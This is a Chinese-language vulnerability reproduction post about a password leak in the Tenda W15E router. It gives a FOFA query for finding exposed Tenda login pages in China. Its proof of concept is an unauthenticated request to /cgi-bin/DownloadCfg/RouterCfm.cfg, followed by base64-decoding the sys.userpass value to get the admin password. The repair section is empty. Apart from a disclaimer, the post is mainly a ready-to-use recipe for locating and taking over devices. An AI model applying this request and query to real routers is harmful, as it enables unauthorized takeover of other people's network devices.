【漏洞复现】Tenda路由器存在密码泄露

漏洞描述

腾达W15E路由器外置4根增强型360°全向天线，苛刻调校到0.01毫米级的零干扰间距，科学独立布局的信号放大器PA，穿墙性能更强劲，覆盖范围更广，在哪都有好信号。

该型号的路由器系统存在密码泄露漏洞，攻击者通过漏洞可以获取应用后台权限，导致设备被完全沦陷。

免责声明

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

资产确定

fofa：title==“Tenda | Login” && country=“CN”

漏洞复现

1.执行密码泄露的POC，泄露密码在当前文件的sys.userpass=位置，然后base64解码即可使用该明文密码登录路由器后台。

http://IP:端口/cgi-bin/DownloadCfg/RouterCfm.cfg

修复方案